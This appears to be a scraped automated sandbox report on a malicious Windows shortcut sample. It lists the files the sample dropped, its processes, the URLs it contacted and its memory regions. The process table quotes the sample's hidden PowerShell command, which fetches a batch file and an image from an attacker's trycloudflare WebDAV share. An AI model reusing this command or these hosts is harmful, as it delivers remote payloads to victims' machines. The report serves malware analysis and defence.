Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
dial2%20(3).Ink.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Fri Feb 2 17:37:06 2018, mtime=Fri Feb 2 17:37:12 2018, atime=Fri Feb 2 17:37:06
2018, length=446976, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mwe5mzu.c5r.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eebk5i2h.yvx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iasj4ixj.ayc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iautz3wr.33g.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\54ee5eacd577877a.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IS5WUGJY89UCG25FP76A.temp
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\file.bat
& start \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\1.jpg' \"$env:USERPROFILE\Downloads\"; Sta
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://pizza-practices-representative-country.trycloudflare.com
|
unknown
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://pizza-practices-representative-country.trycloudflare.com.Z2
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFB4B1E2000
|
trusted library allocation
|
page read and write
|
||
|
27C27BF000
|
stack
|
page read and write
|
||
|
7FFB4B384000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B330000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2D0000
|
trusted library allocation
|
page read and write
|
||
|
27C1F4E000
|
stack
|
page read and write
|
||
|
7FFB4B220000
|
trusted library allocation
|
page read and write
|
||
|
27C1EC6000
|
stack
|
page read and write
|
||
|
1E6D0542000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6E10000
|
heap
|
page read and write
|
||
|
1E6CF00F000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B440000
|
trusted library allocation
|
page read and write
|
||
|
1E6CC6B0000
|
heap
|
page read and write
|
||
|
1E6D059B000
|
trusted library allocation
|
page read and write
|
||
|
1E6CE4F0000
|
heap
|
page read and write
|
||
|
7FFB4B320000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B340000
|
trusted library allocation
|
page read and write
|
||
|
7DF4BA260000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6E678B000
|
heap
|
page read and write
|
||
|
7FFB4B270000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B00D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6CC5B0000
|
heap
|
page read and write
|
||
|
1E6E69EA000
|
heap
|
page read and write
|
||
|
27C338E000
|
stack
|
page read and write
|
||
|
1E6CE080000
|
heap
|
page read and write
|
||
|
7DF4BA270000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B430000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6E6A71000
|
heap
|
page read and write
|
||
|
7FFB4B1BA000
|
trusted library allocation
|
page read and write
|
||
|
1E6D0280000
|
trusted library allocation
|
page read and write
|
||
|
1E6E69A0000
|
heap
|
page read and write
|
||
|
7FFB4B389000
|
trusted library allocation
|
page read and write
|
||
|
1E6CC53E000
|
heap
|
page read and write
|
||
|
7FFB4B240000
|
trusted library allocation
|
page read and write
|
||
|
1E6E66E9000
|
heap
|
page read and write
|
||
|
1E6DE6C1000
|
trusted library allocation
|
page read and write
|
||
|
27C29BB000
|
stack
|
page read and write
|
||
|
7FFB4B450000
|
trusted library allocation
|
page read and write
|
||
|
27C2637000
|
stack
|
page read and write
|
||
|
7FFB4B39C000
|
trusted library allocation
|
page read and write
|
||
|
1E6D0624000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6A3F000
|
heap
|
page read and write
|
||
|
7FFB4B423000
|
trusted library allocation
|
page read and write
|
||
|
1E6CC4A0000
|
heap
|
page read and write
|
||
|
7FFB4B1A0000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6939000
|
heap
|
page read and write
|
||
|
1E6E6800000
|
heap
|
page read and write
|
||
|
1E6E69D7000
|
heap
|
page read and write
|
||
|
1E6E6AE0000
|
heap
|
page execute and read and write
|
||
|
7FFB4B2C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B480000
|
trusted library allocation
|
page read and write
|
||
|
1E6CC514000
|
heap
|
page read and write
|
||
|
7FFB4B0E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B390000
|
trusted library allocation
|
page read and write
|
||
|
1E6CEFDD000
|
trusted library allocation
|
page read and write
|
||
|
1E6E67BD000
|
heap
|
page read and write
|
||
|
7FFB4B120000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C2739000
|
stack
|
page read and write
|
||
|
27C1FCE000
|
stack
|
page read and write
|
||
|
7FFB4B2A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B490000
|
trusted library allocation
|
page read and write
|
||
|
27C24FA000
|
stack
|
page read and write
|
||
|
1E6CC51F000
|
heap
|
page read and write
|
||
|
1E6E6A45000
|
heap
|
page read and write
|
||
|
7FFB4B470000
|
trusted library allocation
|
page read and write
|
||
|
1E6CC586000
|
heap
|
page read and write
|
||
|
7FFB4B01B000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6A8E000
|
heap
|
page read and write
|
||
|
27C22FE000
|
stack
|
page read and write
|
||
|
7FFB4B420000
|
trusted library allocation
|
page read and write
|
||
|
1E6D0504000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6C70000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B020000
|
trusted library allocation
|
page read and write
|
||
|
1E6CF933000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B200000
|
trusted library allocation
|
page read and write
|
||
|
1E6CE070000
|
trusted library allocation
|
page read and write
|
||
|
1E6CE410000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B260000
|
trusted library allocation
|
page read and write
|
||
|
27C283E000
|
stack
|
page read and write
|
||
|
1E6CC750000
|
heap
|
page read and write
|
||
|
1E6E66C0000
|
heap
|
page read and write
|
||
|
1E6CF96B000
|
trusted library allocation
|
page read and write
|
||
|
1E6CC55E000
|
heap
|
page read and write
|
||
|
1E6CFDBF000
|
trusted library allocation
|
page read and write
|
||
|
1E6E69D2000
|
heap
|
page read and write
|
||
|
1E6CFA80000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B300000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6CC51A000
|
heap
|
page read and write
|
||
|
7FFB4B0B0000
|
trusted library allocation
|
page read and write
|
||
|
1E6CC54E000
|
heap
|
page read and write
|
||
|
1E6E6777000
|
heap
|
page read and write
|
||
|
1E6E6A87000
|
heap
|
page read and write
|
||
|
7FFB4B380000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B210000
|
trusted library allocation
|
page read and write
|
||
|
7DF4BA280000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6CC517000
|
heap
|
page read and write
|
||
|
1E6CE480000
|
trusted library allocation
|
page read and write
|
||
|
1E6CF0BD000
|
trusted library allocation
|
page read and write
|
||
|
1E6CFAA8000
|
trusted library allocation
|
page read and write
|
||
|
1E6CEFC1000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6992000
|
heap
|
page read and write
|
||
|
1E6CE747000
|
trusted library allocation
|
page read and write
|
||
|
27C247E000
|
stack
|
page read and write
|
||
|
1E6CE400000
|
heap
|
page readonly
|
||
|
1E6E69B0000
|
heap
|
page read and write
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B4B0000
|
trusted library allocation
|
page read and write
|
||
|
27C2579000
|
stack
|
page read and write
|
||
|
1E6CE490000
|
heap
|
page execute and read and write
|
||
|
1E6E693D000
|
heap
|
page read and write
|
||
|
1E6CE6B0000
|
heap
|
page execute and read and write
|
||
|
1E6DE9B7000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6AAB000
|
heap
|
page read and write
|
||
|
1E6E674D000
|
heap
|
page read and write
|
||
|
1E6DE9A9000
|
trusted library allocation
|
page read and write
|
||
|
1E6D02A9000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4D2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6CC54A000
|
heap
|
page read and write
|
||
|
7FFB4B350000
|
trusted library allocation
|
page read and write
|
||
|
1E6CEEF6000
|
trusted library allocation
|
page read and write
|
||
|
1E6CC7A0000
|
heap
|
page read and write
|
||
|
1E6E6A9F000
|
heap
|
page read and write
|
||
|
7FFB4B4E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B250000
|
trusted library allocation
|
page read and write
|
||
|
27C263E000
|
stack
|
page read and write
|
||
|
1E6CF9C7000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B230000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6A97000
|
heap
|
page read and write
|
||
|
1E6CE3F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2F0000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6786000
|
heap
|
page read and write
|
||
|
1E6CC542000
|
heap
|
page read and write
|
||
|
1E6CEE61000
|
trusted library allocation
|
page read and write
|
||
|
1E6CC522000
|
heap
|
page read and write
|
||
|
27C293E000
|
stack
|
page read and write
|
||
|
7FFB4B002000
|
trusted library allocation
|
page read and write
|
||
|
1E6CC6F0000
|
heap
|
page read and write
|
||
|
1E6DE9AD000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B280000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B487000
|
trusted library allocation
|
page read and write
|
||
|
1E6DE6E1000
|
trusted library allocation
|
page read and write
|
||
|
1E6CF8F6000
|
trusted library allocation
|
page read and write
|
||
|
27C340E000
|
stack
|
page read and write
|
||
|
1E6E6A32000
|
heap
|
page read and write
|
||
|
1E6D020B000
|
trusted library allocation
|
page read and write
|
||
|
27C23FF000
|
stack
|
page read and write
|
||
|
1E6CC58C000
|
heap
|
page read and write
|
||
|
1E6DE6F1000
|
trusted library allocation
|
page read and write
|
||
|
1E6CEFB4000
|
trusted library allocation
|
page read and write
|
||
|
1E6DE730000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B360000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B460000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C227D000
|
stack
|
page read and write
|
||
|
1E6CC7A5000
|
heap
|
page read and write
|
||
|
1E6E692D000
|
heap
|
page read and write
|
||
|
1E6CEFCE000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6A2A000
|
heap
|
page read and write
|
||
|
1E6E68E0000
|
heap
|
page read and write
|
||
|
1E6CE440000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B003000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E6D0295000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6956000
|
heap
|
page read and write
|
||
|
1E6CE504000
|
heap
|
page read and write
|
||
|
7FFB4B010000
|
trusted library allocation
|
page read and write
|
||
|
1E6CEF6C000
|
trusted library allocation
|
page read and write
|
||
|
1E6E68FC000
|
heap
|
page read and write
|
||
|
1E6D04E5000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B004000
|
trusted library allocation
|
page read and write
|
||
|
27C26B8000
|
stack
|
page read and write
|
||
|
1E6CE497000
|
heap
|
page execute and read and write
|
||
|
1E6CEF1D000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6A61000
|
heap
|
page read and write
|
||
|
7FFB4B1B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2B0000
|
trusted library allocation
|
page read and write
|
||
|
27C237B000
|
stack
|
page read and write
|
||
|
1E6CC755000
|
heap
|
page read and write
|
||
|
1E6D02EE000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B398000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4D4000
|
trusted library allocation
|
page read and write
|
||
|
1E6CE6C1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0B6000
|
trusted library allocation
|
page read and write
|
||
|
1E6CF211000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6AA1000
|
heap
|
page read and write
|
||
|
7FFB4B05C000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C28BD000
|
stack
|
page read and write
|
||
|
1E6CC4DB000
|
heap
|
page read and write
|
||
|
1E6CE8E8000
|
trusted library allocation
|
page read and write
|
||
|
27C25BE000
|
stack
|
page read and write
|
||
|
1E6CC690000
|
heap
|
page read and write
|
||
|
7FFB4B2E0000
|
trusted library allocation
|
page read and write
|
||
|
1E6E674A000
|
heap
|
page read and write
|
||
|
1E6E67A5000
|
heap
|
page read and write
|
||
|
1E6CF036000
|
trusted library allocation
|
page read and write
|
||
|
1E6E6AB5000
|
heap
|
page read and write
|
||
|
7FFB4B290000
|
trusted library allocation
|
page read and write
|
||
|
1E6CEB5D000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B310000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B363000
|
trusted library allocation
|
page read and write
|
There are 192 hidden memdumps, click here to show them.